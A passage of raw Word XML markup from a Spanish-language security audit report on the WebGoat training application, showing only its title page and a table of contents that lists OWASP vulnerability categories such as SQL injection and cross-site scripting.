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B95D8" w14:textId="77777777" w:rsidR="009022FF" w:rsidRDefault="009022FF" w:rsidP="003563E4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E49624"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F1C8117" w14:textId="73262738" w:rsidR="006E5B01" w:rsidRPr="006E5B01" w:rsidRDefault="006E5B01" w:rsidP="003563E4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E49624"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E5B01">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E49624"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>INFORME DE AUDITORIA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32494CDC" w14:textId="3C44B283" w:rsidR="006E5B01" w:rsidRPr="006E5B01" w:rsidRDefault="006E5B01" w:rsidP="003563E4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="E49624"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E5B01">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="E49624"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Pagina Analizada: WebGoat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32810D01" w14:textId="1D099E79" w:rsidR="006E5B01" w:rsidRDefault="006E5B01" w:rsidP="003563E4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="E49624"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73C54CF4" w14:textId="77777777" w:rsidR="009022FF" w:rsidRPr="006E5B01" w:rsidRDefault="009022FF" w:rsidP="003563E4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="E49624"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B444DE2" w14:textId="798FCF1E" w:rsidR="006E5B01" w:rsidRDefault="009022FF" w:rsidP="003563E4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>TABLA DE CONTENIDO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33921C73" w14:textId="075A3F99" w:rsidR="006E5B01" w:rsidRDefault="006E5B01" w:rsidP="003563E4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C467F90" w14:textId="1C6AE49C" w:rsidR="006E5B01" w:rsidRDefault="009022FF" w:rsidP="003563E4">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Introducción</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E09A20" w14:textId="4849C771" w:rsidR="009022FF" w:rsidRDefault="009022FF" w:rsidP="003563E4">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Objetivos de la revisión </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51751E87" w14:textId="4BD0F436" w:rsidR="009022FF" w:rsidRDefault="009022FF" w:rsidP="003563E4">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Resumen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A3596A8" w14:textId="77777777" w:rsidR="009022FF" w:rsidRPr="009022FF" w:rsidRDefault="009022FF" w:rsidP="003563E4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="150B992E" w14:textId="3BA9C3AF" w:rsidR="009022FF" w:rsidRDefault="009022FF" w:rsidP="003563E4">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Metodología de análisis</w:t>
      </w:r>
      <w:r w:rsidR="002F6D72">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Information gathering)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F51985" w14:textId="673ACBD5" w:rsidR="009022FF" w:rsidRDefault="009022FF" w:rsidP="003563E4">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Hallazgos </w:t>
      </w:r>
      <w:r w:rsidR="00AE237A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>pasivos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27B406E3" w14:textId="36674071" w:rsidR="009022FF" w:rsidRDefault="009022FF" w:rsidP="003563E4">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Hallazgos </w:t>
      </w:r>
      <w:r w:rsidR="00AE237A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>activos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC3F911" w14:textId="45251A69" w:rsidR="009022FF" w:rsidRDefault="009022FF" w:rsidP="003563E4">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Otros hallazgos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B72FCE5" w14:textId="3BF3C330" w:rsidR="009022FF" w:rsidRDefault="009022FF" w:rsidP="003563E4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D987267" w14:textId="12EBB40F" w:rsidR="009022FF" w:rsidRPr="00F779E2" w:rsidRDefault="009022FF" w:rsidP="003563E4">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Vulnerabilidades Identificadas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="602770A9" w14:textId="3310D64C" w:rsidR="009022FF" w:rsidRDefault="009022FF" w:rsidP="003563E4">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidR="00F779E2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">3 </w:t>
      </w:r>
      <w:r w:rsidR="00860C84">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">injection - </w:t>
      </w:r>
      <w:r w:rsidR="00F779E2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E897F7" w14:textId="4E65B6A7" w:rsidR="00F779E2" w:rsidRDefault="00F779E2" w:rsidP="003563E4">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidR="00860C84">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>3 injection - Cross Site Scripting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3594591D" w14:textId="66E58773" w:rsidR="00F779E2" w:rsidRDefault="00F779E2" w:rsidP="003563E4">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidR="00D362E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">5 Security Misconfiguration </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="733EC298" w14:textId="68CD13D1" w:rsidR="00F779E2" w:rsidRDefault="00F779E2" w:rsidP="003563E4">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidR="00D362E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>6 Vuln &amp; outdated Components</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A311542" w14:textId="2F2BFA35" w:rsidR="00F779E2" w:rsidRDefault="00F779E2" w:rsidP="003563E4">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidR="00D362E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>7 Identity &amp; Auth Failure – Secure Passwords</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2740A66C" w14:textId="28B9F675" w:rsidR="009022FF" w:rsidRDefault="009022FF" w:rsidP="003563E4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0130AFCA" w14:textId="0A37BD6E" w:rsidR="009022FF" w:rsidRDefault="009022FF" w:rsidP="003563E4">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Análisis de riesgos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="176ACABA" w14:textId="705CFEA3" w:rsidR="00C46D42" w:rsidRDefault="00C46D42" w:rsidP="003563E4">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Resumen de vulnerabilidades</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C445D97" w14:textId="77777777" w:rsidR="009022FF" w:rsidRPr="009022FF" w:rsidRDefault="009022FF" w:rsidP="003563E4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BEBEBE5" w14:textId="6A5B7871" w:rsidR="009022FF" w:rsidRDefault="009022FF" w:rsidP="003563E4">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Recomendaciones</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52287B57" w14:textId="13A93846" w:rsidR="00934311" w:rsidRDefault="00934311" w:rsidP="003563E4">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">A3 </w:t>
      </w:r>
      <w:r w:rsidR="00D362E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>injection - SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F61AE4" w14:textId="1C228D61" w:rsidR="00D362E6" w:rsidRDefault="00D362E6" w:rsidP="003563E4">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>A3 injection - Cross Site Scripting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BFD5FCA" w14:textId="77777777" w:rsidR="00192B87" w:rsidRDefault="00192B87" w:rsidP="003563E4">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">A5 Security Misconfiguration </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35FFA956" w14:textId="77777777" w:rsidR="00192B87" w:rsidRDefault="00192B87" w:rsidP="003563E4">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>A6 Vuln &amp; outdated Components</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74969003" w14:textId="7E047ED2" w:rsidR="00192B87" w:rsidRDefault="00192B87" w:rsidP="003563E4">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>A7 Identity &amp; Auth Failure – Secure Passwords</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15DDBC71" w14:textId="77777777" w:rsidR="009022FF" w:rsidRPr="009022FF" w:rsidRDefault="009022FF" w:rsidP="003563E4">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E049B94" w14:textId="77777777" w:rsidR="009022FF" w:rsidRDefault="009022FF" w:rsidP="003563E4">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
